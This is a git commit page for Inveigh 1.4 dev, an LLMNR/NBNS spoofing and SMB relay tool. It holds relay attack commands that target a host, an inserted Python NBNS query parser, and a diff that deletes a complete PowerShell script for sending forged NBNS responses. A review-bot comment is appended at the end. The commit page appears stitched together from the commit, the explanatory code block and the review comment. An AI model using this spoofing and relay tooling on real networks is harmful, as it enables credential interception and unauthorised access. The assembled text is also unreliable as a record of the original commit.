author | Kevin Robertson <robertsonk@gmail.com> | 2018-02-19 23:36:13 -0500 |
---|---|---|
committer | Kevin Robertson <robertsonk@gmail.com> | 2018-02-19 23:36:13 -0500 |
commit | 43edf71b54567698d24d7c44ce3410120841b53a (patch) | |
tree | 978bae559d6ec42f76c1168f125704132e755b59 /Extras/Send-NBNSResponse.ps1 | |
parent | 32550b99a7f8e8006f16d185e9d6f40fe4b3d9ea (diff) | |
download | Inveigh-43edf71b54567698d24d7c44ce3410120841b53a.tar.gz Inveigh-43edf71b54567698d24d7c44ce3410120841b53a.zip |
Inveigh 1.4 dev
This is an early version of Inveigh 1.4. There is probably a lot that is
broken.
Inveigh:
1. Invoke-DNSUpdate integration - Inveigh will attempt to inject DNS
records if the same LLMNR/NBNS request is observed from multiple
systems. The goal is to find requests that could be valid in other
subnets and leverage them through DNS. This version requires that
Inveigh is running with a domain auth user context.
2. Reworked output system and formatting.
3. hmm...I forget.
Inveigh Relay:
1. New attack with Invoke-TheHash integration - In addition to the
standard psexec style attack, Inveigh Relay now has the ability to
create and maintain authenticated priv and unpriv SMB2 sessions. These
sessions can be used by Invoke-SMBClient (attack file shares) and
Invoke-SMBExec.
Invoke-InveighRelay -Attack session -Target 10.10.10.10
wait for relay
Get-Inveigh -session
Invoke-SMBClient -Session 0 -Source \\10.10.10.10\share
2. Multitarget - Inveigh Relay will now accept an array of targets. As
relay attempts come in, Inveigh Relay will attempt to select the best
target (still needs work).
3. SMB signing check for targets on startup.
4. Reworked output system and formatting.
I'm temporarily housing newer versions of Invoke-DNSUpdate,
Invoke-SMBClient, and Invoke-SMBExec here. They need to be imported into
the same powershell session for integration to work. There is also
probably a lot broken with these.
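The Invoke-DNSUpdate integration described in item 1 hinges on one heuristic: an LLMNR/NBNS name requested by several different hosts is a candidate worth seeding into DNS, since the same lookup is likely failing in other subnets too. The following is an added example, not Inveigh's code, that shows that selection logic for NBNS in Python: it encodes and decodes NetBIOS names in the RFC 1001/1002 first-level form (the same nibble-plus-0x41 scheme the removed Send-NBNSResponse.ps1 builds by hand, with `CA` pairs for space padding and `AA` for the 0x00 suffix), parses UDP/137 name queries, and reports names seen from at least two distinct source IPs. The packet payloads are constructed inline rather than captured, and the threshold of two requesters is an assumption for illustration.

```python
import struct
from collections import defaultdict

NBNS_NAME_LEN = 32  # 16 raw bytes become 32 half-ASCII bytes on the wire


def encode_nbns_name(name: str, suffix: int = 0x00) -> bytes:
    """First-level encode a NetBIOS name (RFC 1001 section 14.1).

    The name is upper-cased, space-padded to 15 bytes and followed by a
    one-byte suffix (0x00 = workstation service); each of the 16 bytes is
    split into two nibbles and each nibble is offset by 0x41 ('A').
    Returns the wire form: 0x20 length byte, 32 encoded bytes, 0x00 terminator.
    """
    raw = name.upper().encode("ascii")[:15].ljust(15, b" ") + bytes([suffix & 0xFF])
    encoded = bytearray()
    for b in raw:
        encoded.append(0x41 + (b >> 4))
        encoded.append(0x41 + (b & 0x0F))
    return bytes([NBNS_NAME_LEN]) + bytes(encoded) + b"\x00"


def decode_nbns_name(data: bytes, offset: int = 12):
    """Reverse of encode_nbns_name. Returns (name, suffix, offset_after_name)."""
    if len(data) < offset + 1 + NBNS_NAME_LEN + 1 or data[offset] != NBNS_NAME_LEN:
        raise ValueError("not a single 32-byte NetBIOS label")
    enc = data[offset + 1 : offset + 1 + NBNS_NAME_LEN]
    if any(not (0x41 <= c <= 0x50) for c in enc):  # only 'A'..'P' are valid nibbles
        raise ValueError("invalid half-ASCII byte in NetBIOS name")
    raw = bytes(((enc[i] - 0x41) << 4) | (enc[i + 1] - 0x41)
                for i in range(0, NBNS_NAME_LEN, 2))
    name = raw[:15].rstrip(b" ").decode("ascii", errors="replace")
    return name, raw[15], offset + 1 + NBNS_NAME_LEN + 1


def build_nbns_query(txid: int, name: str) -> bytes:
    """Build a broadcast NBNS name query: flags 0x0110 (opcode QUERY, RD, B),
    one question of type NB (0x0020), class IN."""
    header = struct.pack(">HHHHHH", txid & 0xFFFF, 0x0110, 1, 0, 0, 0)
    return header + encode_nbns_name(name) + struct.pack(">HH", 0x0020, 0x0001)


def parse_nbns_query(payload: bytes):
    """Parse a UDP/137 payload; return a dict for an NB name query, else None."""
    if len(payload) < 12:
        return None
    txid, flags, qdcount, _an, _ns, _ar = struct.unpack(">HHHHHH", payload[:12])
    if flags & 0x8000 or qdcount != 1:  # response bit set, or not a single question
        return None
    try:
        name, suffix, off = decode_nbns_name(payload, 12)
        qtype, qclass = struct.unpack(">HH", payload[off : off + 4])
    except (ValueError, struct.error):
        return None
    if qtype != 0x0020 or qclass != 0x0001:
        return None
    return {"txid": txid, "name": name, "suffix": suffix}


def find_multi_source_names(observations, min_sources: int = 2):
    """Map each queried name to the distinct source IPs asking for it and keep
    the names requested by at least min_sources hosts (assumed threshold)."""
    sources = defaultdict(set)
    for src_ip, payload in observations:
        q = parse_nbns_query(payload)
        if q is not None:
            sources[q["name"]].add(src_ip)
    return {n: sorted(s) for n, s in sources.items() if len(s) >= min_sources}


# Constructed sample traffic (not a real capture): (source IP, UDP payload).
SAMPLE_OBSERVATIONS = [
    ("10.0.0.11", build_nbns_query(0x9C9E, "WPAD")),
    ("10.0.0.12", build_nbns_query(0x1A2B, "wpad")),
    ("10.0.0.13", build_nbns_query(0x0F0F, "WPAD")),
    ("10.0.0.11", build_nbns_query(0x4444, "FILESRV01")),
    ("10.0.0.11", build_nbns_query(0x4445, "FILESRV01")),  # same host, repeat
    ("10.0.0.20", build_nbns_query(0x7777, "TYPO-HOST")),
    ("10.0.0.21", b"\x9c\x9e\x85\x00" + b"\x00" * 8),  # a response, ignored
]

if __name__ == "__main__":
    for name, hosts in find_multi_source_names(SAMPLE_OBSERVATIONS).items():
        print(f"{name}: requested by {len(hosts)} hosts {hosts}")
```

Repeated lookups from one host (FILESRV01 above) do not count; only the number of distinct requesters matters, which is what separates a name that is genuinely unresolvable across the segment from one machine with a stale mapping.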
Diffstat (limited to 'Extras/Send-NBNSResponse.ps1')
-rw-r--r-- | Extras/Send-NBNSResponse.ps1 | 105 |
1 files changed, 0 insertions, 105 deletions
diff --git a/Extras/Send-NBNSResponse.ps1 b/Extras/Send-NBNSResponse.ps1 deleted file mode 100644 index 3d5ed02..0000000 --- a/Extras/Send-NBNSResponse.ps1 +++ /dev/null 
@@ -1,105 +0,0 @@ - -function Send-NBNSResponse -{ -<# -.SYNOPSIS -Send-NBNSResponse sends a crafted NBNS response packet to a specific target. For name resolution to be successful, -the specified TargetIP, Hostname, and TransactionID must match a very (very very) recent NBNS request. You must -have an external method (wireshark,etc) of viewing the required NBNS request fields for traffic on the target -subnet. The odds of pulling this attack off manually are slim due to the narrow response window. I've only been -able to get it to work manually by watching tshark with the the transaction ID being listed in the output. -Ideally, this function would be fed by another script. - -.PARAMETER Hostname -Default = WPAD: Specify a hostname for NBNS spoofing. - -.PARAMETER NBNSTTL -Default = 165 Seconds: Specify a custom NBNS TTL in seconds for the response packet. - -.PARAMETER SendPort -Default = 137: Specify a source port for the NBNS response. - -.PARAMETER SpooferIP -IP address for NBNS spoofing. This parameter is only necessary when redirecting victims to a system -other than the function host. - -.PARAMETER TargetIP -IP address to target for the NBNS response. - -.PARAMETER TransactionID -NBNS transaction ID that matches the transaction from the NBNS request. 
- -.EXAMPLE -Send-NBNSResponse -Target 192.168.1.11 -Hostname test -TransactionID 9c9e - -.LINK -https://github.com/Kevin-Robertson/Inveigh -#> - - -[CmdletBinding()] -param -( -[parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$SpooferIP="", -[parameter(Mandatory=$true)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$TargetIP="", -[parameter(Mandatory=$true)][ValidatePattern('^[A-Fa-f0-9]{4}$')][String]$TransactionID="", -[parameter(Mandatory=$true)][String]$Hostname = "", -[parameter(Mandatory=$false)][Int]$SendPort="137", -[parameter(Mandatory=$false)][Int]$NBNSTTL="165", -[parameter(ValueFromRemainingArguments=$true)]$invalid_parameter -) - -if ($invalid_parameter) -{ - throw "$($invalid_parameter) is not a valid parameter." -} - -if(!$SpooferIP) -{ - $SpooferIP = (Test-Connection 127.0.0.1 -count 1 | Select-Object -ExpandProperty Ipv4Address) -} - -$Hostname = $Hostname.ToUpper() - -$hostname_bytes = 0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41, - 0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x41,0x41,0x00 - -$hostname_encoded = [System.Text.Encoding]::UTF8.GetBytes($Hostname) -$hostname_encoded = [System.BitConverter]::ToString($hostname_encoded) -$hostname_encoded = $hostname_encoded.Replace("-","") -$hostname_encoded = [System.Text.Encoding]::UTF8.GetBytes($hostname_encoded) -$NBNS_TTL_bytes = [System.BitConverter]::GetBytes($NBNSTTL) -[Array]::Reverse($NBNS_TTL_bytes) -$Transaction_ID_encoded = $TransactionID.Insert(2,'-') -$Transaction_ID_bytes = $Transaction_ID_encoded.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} - -for($i=0; $i -lt $hostname_encoded.Count; $i++) -{ - - if($hostname_encoded[$i] -gt 64) - { - $hostname_bytes[$i] = $hostname_encoded[$i] + 10 - } - else - { - $hostname_bytes[$i] = $hostname_encoded[$i] + 17 - } - -} - -$NBNS_response_packet = $Transaction_ID_bytes + - 
0x85,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x20 + - $hostname_bytes + - 0x00,0x20,0x00,0x01 + - $NBNS_TTL_bytes + - 0x00,0x06,0x00,0x00 + - ([System.Net.IPAddress][String]([System.Net.IPAddress]$SpooferIP)).GetAddressBytes() + - 0x00,0x00,0x00,0x00 - -$send_socket = New-Object System.Net.Sockets.UdpClient($SendPort) -$destination_IP = [System.Net.IPAddress]::Parse($TargetIP) -$destination_point = New-Object Net.IPEndpoint($destination_IP,137) -$send_socket.Connect($destination_point) -$send_socket.Send($NBNS_response_packet,$NBNS_response_packet.Length) -$send_socket.Close() -}
\ No newline at end of file |
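Review bot: the commit message never mentions that Extras/Send-NBNSResponse.ps1 is deleted outright (105 lines removed, no replacement anywhere in this diff), while the message itemises the Inveigh and Inveigh Relay changes and the temporarily housed Invoke-DNSUpdate/Invoke-SMBClient/Invoke-SMBExec copies. Add a line to the message stating that the standalone function is dropped, or where its crafted-response capability now lives, since the deleted file's own synopsis says "Ideally, this function would be fed by another script", which suggests users may have scripted against it and will look for a note explaining its removal.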